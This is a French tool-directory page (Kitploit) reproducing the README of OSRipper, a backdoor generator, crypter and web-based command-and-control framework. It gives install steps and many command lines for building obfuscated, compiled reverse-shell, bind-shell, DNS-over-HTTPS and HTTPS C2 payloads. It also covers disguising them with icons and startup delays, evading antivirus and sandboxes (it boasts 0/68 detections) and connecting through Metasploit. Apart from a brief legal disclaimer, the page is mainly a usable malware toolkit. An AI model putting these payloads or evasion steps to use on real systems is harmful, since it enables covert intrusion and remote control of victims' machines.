Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OSRipper — Backdoor et Framework de crypter multi-plateforme contournant les antivirus avec une interface web légère intégrée | Kitploit
Outils/GitHubGitHub/noahoksuz/osripper
Frameworks d'ExploitationGénération de PayloadsÉvasion IDS/IPSPost-ExploitationTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming
GitHubnoahoksuz/osripper

OSRipper

Backdoor et Framework de crypter multi-plateforme contournant les antivirus avec une interface web légère intégrée

Voir le dépôt
3285058il y a 6 moisVérifié par Kitploit
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

Générateur de payloads multiplateforme avancé et crypteur avec capacités FUD

Fonctionnalités • Démarrage rapide • Interface Web • Types de payloads • Documentation


Aperçu

OSRipper est un générateur de portes dérobées et un crypteur sophistiqué, totalement indétectable (FUD), conçu pour les tests d'intrusion autorisés et les opérations d'équipe rouge. Il intègre des techniques d'évasion avancées, plusieurs types de payloads et une interface C2 moderne basée sur le web pour la gestion des systèmes compromis.

Points clés

  • Totalement indétectable (FUD) - Les techniques d'évasion avancées contournent les solutions antivirales modernes
  • Interface C2 basée sur le web - Tableau de bord moderne pour la gestion des sessions actives
  • Plusieurs types de payloads - Shells liants, shells inversés, C2 via DoH, C2 via HTTPS, et plus encore
  • Obfuscation multicouche - Obfuscation standard et renforcée avec variables aléatoires
  • Compilation binaire - Compilation de payloads en exécutables autonomes
  • Communications chiffrées - Canaux C2 SSL/TLS et HTTPS avec épinglage de certificat
  • Fonctionnalités furtives - Détection de machine virtuelle, anti-débogage, déguisement de processus

Fonctionnalités

Génération de payloads

Type de payloadDescriptionCas d'utilisation
Shell liantOuvre un port sur la machine victimeAccès direct lorsque les connexions inversées sont bloquées
Meterpreter inverse TCPConnexion inverse chiffrée SSL/TLSTests d'intrusion standard
C2 DNS-over-HTTPSCanal C2 furtif basé sur DoHContourner les restrictions réseau
C2 HTTPSC2 HTTPS avec épinglage de certificatCanal C2 sécurisé et authentifié
Payload étagéLivraison web multi-étapesDéploiement furtif renforcé
Crypteur de code personnaliséObfusquer tout script PythonChiffrement de payload personnalisé

Techniques d'évasion

  • Obfuscation avancée - Encodage de code multicouche avec variables aléatoires
  • Obfuscation renforcée - Anti-débogage, détection de machine virtuelle, injection de code factice
  • Détection anti-VM - Évasion des sandbox et machines virtuelles
  • Délais furtifs - Délais de démarrage aléatoires (5-15 secondes)
  • Déguisement de processus - Se faire passer pour des processus système légitimes
  • Randomisation des signatures - Chaque payload est unique

Fonctionnalités de l'interface Web

  • Tableau de bord des sessions - Visualiser toutes les sessions C2 actives
  • Terminal interactif - Exécuter des commandes via l'interface web
  • Générateur de payloads - Générer des payloads directement depuis l'interface web
  • Gestion des sessions - Afficher les informations système, l'historique des commandes et gérer les sessions
  • Mises à jour en temps réel - Exécution et visualisation des réponses en direct

Capacités avancées

  • Intégration Ngrok - Création automatique de tunnels pour IP dynamiques
  • Épinglage de certificat - C2 HTTPS sécurisé avec validation de certificat
  • Persistance de session - Maintenir les connexions après redémarrages
  • File d'attente de commandes - Mise en file d'attente des commandes pour les agents hors ligne
  • Analyse des réponses - Analyse automatique des sorties de commandes

Démarrage rapide

Installation

root@kitploit:~
# Clone du dépôt
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Installation des dépendances
pip3 install -r requirements.txt

# Installation du paquet
pip3 install -e .

Important — exécutez la configuration pour les fonctionnalités optionnelles (ngrok, compilation binaire) :
Sur de nombreux systèmes (notamment Linux avec un environnement Python géré de manière externe), vous devez exécuter la configuration intégrée pour que les dépendances optionnelles soient installées dans le venv propre à OSRipper. Faites-le une fois après l'installation :

root@kitploit:~
osripper-cli setup

Ceci crée ~/.local/share/osripper/venv, y installe pyngrok, nuitka et sandboxed, et toutes les exécutions ultérieures de osripper / osripper-cli les utiliseront automatiquement. Sans cela, les options --ngrok et --compile vous demanderont d'exécuter la configuration. Utilisez osripper-cli setup --system uniquement si vous préférez une installation pip système/utilisateur plutôt que le venv.

Utilisation de base

Mode interactif :

root@kitploit:~
osripper
# ou
python3 -m osripper

Ligne de commande :

root@kitploit:~
# Générer un shell inverse
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Générer un payload C2 DoH
osripper-cli doh -d example.com --obfuscate --compile

Interface Web :

root@kitploit:~
# Démarrer le serveur C2 avec l'interface Web
python -m osripper.c2.server example.com --port 5000

# Accéder au tableau de bord à http://localhost:5000

Interface Web

OSRipper inclut une interface C2 moderne basée sur le web pour la gestion des systèmes compromis.

Fonctionnalités

  • Tableau de bord - Vue d'ensemble de toutes les sessions actives
  • Gestion des sessions - Afficher les informations système et exécuter des commandes
  • Générateur de payloads - Générer des payloads DoH et HTTPS via l'interface web
  • Historique des commandes - Suivi de toutes les commandes exécutées et leurs réponses
  • Mises à jour en temps réel - Exécution et visualisation des réponses en direct

Démarrage du serveur C2

root@kitploit:~
# Utilisation de base
python -m osripper.c2.server example.com

# Avec HTTPS
python -m osripper.c2.server example.com --https

# Port personnalisé
python -m osripper.c2.server example.com --port 8080

# Avec certificat personnalisé
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Accéder à l'interface Web

Une fois le serveur en cours d'exécution, accédez au tableau de bord à :

  • HTTP : http://localhost:5000
  • HTTPS : https://localhost:5000 (si activé)

Types de payloads

1. Porte dérobée (shell liant)

Ouvre un port sur la machine victime et attend les connexions.

root@kitploit:~
osripper-cli bind -p 4444 --obfuscate --compile

Connexion :

root@kitploit:~
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Meterpreter inverse TCP

Connexion inverse chiffrée avec SSL/TLS.

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. C2 DNS-over-HTTPS

Canal C2 furtif utilisant le protocole DNS-over-HTTPS. Contourne de nombreuses restrictions réseau.

root@kitploit:~
# Générer le payload
osripper-cli doh -d example.com --obfuscate --compile

# Démarrer le serveur C2
python -m osripper.c2.server example.com

Fonctionnalités :

  • Communication furtive basée sur DNS
  • Interface Web pour la gestion des sessions
  • Persistance automatique des sessions
  • File d'attente de commandes pour les agents hors ligne

4. C2 HTTPS (épinglage de certificat)

C2 HTTPS sécurisé avec épinglage de certificat pour l'authentification.

root@kitploit:~
# Générer le payload (via l'interface Web ou CLI)
# Démarrer le serveur C2 avec HTTPS
python -m osripper.c2.server example.com --https

# Obtenir l'empreinte du certificat
curl http://localhost:5000/api/cert-fingerprint

Fonctionnalités :

  • Épinglage de certificat pour la sécurité
  • Communication HTTPS chiffrée
  • Intégration de l'interface Web
  • Gestion des sessions

5. Payload étagé

Livraison web multi-étapes pour une furtivité renforcée.

root@kitploit:~
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. Crypteur de code personnalisé

Obfusquer et chiffrer tout script Python.

root@kitploit:~
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Interface en ligne de commande

Options courantes

OptionDescription
--obfuscateActiver l'obfuscation multicouche
--enhancedObfuscation renforcée (anti-débogage, détection VM)
--compileCompiler en binaire autonome
--icon CHEMINIcône personnalisée pour le binaire compilé
--delayAjouter un délai de démarrage aléatoire (5-15 secondes)
--output, -o NOMNom du fichier de sortie
--quiet, -qMode silencieux (sortie minimale)

Exemples

root@kitploit:~
# Shell inverse complet
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# C2 DoH avec toutes les fonctionnalités
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# Chiffrement de script personnalisé
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# Utilisation de ngrok pour IP dynamique
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Résultats de détection

Derniers scans VirusTotal

  • Payload Python : Taux de détection 0/68
  • Binaire compilé : Taux de détection 0/68

Résultat antiscan

Résultats Antiscan


Architecture

root@kitploit:~
┌─────────────────┐
│   Binaire       │
│   généré        │
└─────────────────┘
         │
         │ Exécution
         ▼
┌──────────────────┐
│ Obfuscateur      │
│ (dropper)        │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   SERVEUR C2    │
│   (Interface    │
│   Web)          │
│                 │
└─────────────────┘
         │
         │ Commande/Réponse
         ▼
┌─────────────────┐
│   Agent         │
│   Exécution     │
└─────────────────┘

Captures d'écran

Interface principale

Tableau de bord de l'interface Web

Tableau de bord de l'interface Web


Configuration avancée

Intégration Ngrok

root@kitploit:~
# Générer un payload avec ngrok
osripper-cli reverse --ngrok -p 4444

# Suivre les invites pour configurer le tunnel
# Exécuter : ngrok tcp 4444

Icônes personnalisées

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

Niveaux d'obfuscation

Obfuscation standard :

  • Encodage multicouche
  • Randomisation des variables
  • Obfuscation de la structure du code

Obfuscation renforcée :

  • Toutes les fonctionnalités standard
  • Techniques anti-débogage
  • Détection de machine virtuelle
  • Injection de code factice
  • Évasion avancée
root@kitploit:~
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# Renforcée
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

Configuration C2 HTTPS

root@kitploit:~
# 1. Démarrer le serveur C2 avec HTTPS
python -m osripper.c2.server example.com --https

# 2. Obtenir l'empreinte du certificat
curl http://localhost:5000/api/cert-fingerprint

# 3. Générer le payload avec l'empreinte (via l'interface Web)
# Ou utiliser l'empreinte dans votre génération de payload

Documentation

  • Wiki - Documentation complète
  • Guide d'utilisation - Instructions détaillées
  • Référence API - Documentation développeur

Feuille de route

Terminé (v0.3.2)

  • Génération de payload FUD (détection 0/68)
  • Interface C2 basée sur le web
  • Payload C2 DNS-over-HTTPS
  • C2 HTTPS avec épinglage de certificat
  • Moteur d'obfuscation multicouche
  • Système de gestion des sessions
  • File d'attente et exécution des commandes
  • Détection anti-VM
  • Déguisement de processus

En cours

  • Modules de post-exploitation améliorés
  • Mécanismes de persistance avancés
  • Téléchargement/téléversement de fichiers via l'interface Web
  • Support multi-utilisateurs pour le serveur C2

Projets futurs

  • Techniques d'évasion alimentées par l'IA
  • Infrastructure C2 basée sur la blockchain
  • Support des plateformes mobiles
  • Payloads avancés d'ingénierie sociale

Contribution

Nous accueillons les contributions de la communauté de recherche en sécurité !

Comment contribuer

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité (git checkout -b feature/amazing-feature)
  3. Commiter vos modifications (git commit -m 'Ajout d'une fonctionnalité géniale')
  4. Pousser sur la branche (git push origin feature/amazing-feature)
  5. Ouvrir une Pull Request

Directives de développement

  • Suivre les normes de codage PEP 8
  • Ajouter des docstrings à toutes les fonctions
  • Tester sur plusieurs plateformes
  • S'assurer que les capacités FUD restent intactes

Remerciements

Un remerciement spécial à la communauté de recherche en sécurité et à ces projets :

  • htr-tech/PyObfuscate - Inspiration pour l'obfuscation
  • cedowens/SwiftBelt - Énumération macOS
  • Metasploit Framework - Gestion des payloads

Avertissement légal

IMPORTANT : Cet outil est développé à des fins éducatives et pour des tests d'intrusion autorisés uniquement.

  • Utilisation autorisée : Recherche en sécurité, tests d'intrusion, exercices d'équipe rouge
  • Utilisation interdite : Accès non autorisé, activités malveillantes, fins illégales

Les développeurs ne sont pas responsables d'une mauvaise utilisation de ce logiciel. Les utilisateurs doivent se conformer à toutes les lois et réglementations applicables.


Support

  • Rapports de bugs : Ouvrir un ticket
  • Demandes de fonctionnalités : Discussions
  • Problèmes de sécurité : Contacter les mainteneurs en privé
Télécharger l’outil